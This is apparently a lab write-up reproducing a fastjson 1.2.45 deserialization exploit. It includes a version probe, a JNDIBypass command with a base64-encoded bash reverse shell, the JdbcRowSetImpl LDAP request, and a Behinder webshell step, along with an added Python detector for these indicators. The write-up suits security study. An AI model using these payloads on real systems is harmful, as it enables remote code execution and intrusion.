True unfreedom is building a cage inside one's own heart.

fastjson vulnerability reproduction - 1245 - jdk8u342

Exploit

Reference: https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md

The focus here is on reproducing the process in order to understand the exploitation flow of the vulnerability. There are many excellent articles by experts online, but they are not enough for foundational learning (especially on compiling Java files in IDEA, resolving dependency issues, and so on -__-|), so I am documenting my own reproduction process.

Capture the request at the login endpoint; the request packet is as follows:


Determine the version from the error response: sending a deliberately incomplete object makes the server return an error that reveals the fastjson version.

{
  "@type": "java.lang.AutoCloseable"


The fastjson version is 1.2.45.

According to the lab author's write-up, the JNDI restrictions of newer JDK versions have to be bypassed, so the author's JNDIBypass.jar tool is used.

Use JNDIBypass.jar to start the LDAP service:

java -jar .\JNDIBypass.jar -a 192.168.80.53 -p 1389 -c "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44MC41My8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

Start an nc listener.


Send the packet:

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 262
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/jpiuw",
        "autoCommit":true
    }
}
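As an added, defensive example (not from the original post or the FastJsonParty lab): a request-body check that flags the indicators visible in the request above, namely an explicit "@type" key, the JdbcRowSetImpl gadget class named either as a type or inside a plain value, and a JNDI URL in a string value. It also treats the malformed version probe as a finding. It assumes the raw JSON body is available as a string at a WAF or logging hook; the function names and the benign login body are mine.

```python
import json
import re
from typing import List

# Indicators visible in the request on this page; extend the set for your own environment.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_URL = re.compile(r"\b(?:ldaps?|rmi|iiop)://", re.IGNORECASE)
RAW_TYPE_KEY = re.compile(r'"\s*@type\s*"')


def _walk(node, path: str, findings: List[str]) -> None:
    """Visit every key/value of a parsed JSON document and record suspicious ones."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if key == "@type":
                if value in GADGET_CLASSES:
                    findings.append(f"{here}: known gadget class {value}")
                elif value == "java.lang.Class":
                    findings.append(f"{here}: java.lang.Class (autoType cache priming)")
                else:
                    findings.append(f"{here}: explicit @type {value}")
            elif isinstance(value, str) and value in GADGET_CLASSES:
                # The 'val' trick on this page names the gadget outside an @type key.
                findings.append(f"{here}: gadget class name in value")
            if isinstance(value, str) and JNDI_URL.search(value):
                findings.append(f"{here}: JNDI URL {value}")
            _walk(value, here, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)


def inspect_body(body: str) -> List[str]:
    """Return findings for one JSON request body; an empty list means nothing suspicious."""
    findings: List[str] = []
    try:
        _walk(json.loads(body), "", findings)
    except ValueError:
        # Malformed JSON is itself a signal: the version probe on this page is an unclosed object.
        if RAW_TYPE_KEY.search(body):
            findings.append("malformed JSON containing @type (possible version probe)")
        if JNDI_URL.search(body):
            findings.append("malformed JSON containing JNDI URL")
    return findings


# Second-stage request body from this page, and a constructed benign login body.
PAGE_PAYLOAD = ('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                '"dataSourceName":"ldap://192.168.80.53:1389/jpiuw","autoCommit":true}}')
BENIGN_LOGIN = '{"username":"alice","password":"correct horse"}'
```

Run `inspect_body(PAGE_PAYLOAD)` to see the four findings the page's payload produces, and `inspect_body(BENIGN_LOGIN)` returns an empty list.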


A shell is returned.


java -jar .\JNDIBypass.jar -h


Inject the Ice Scorpion (Behinder) webshell.


Connect to it.
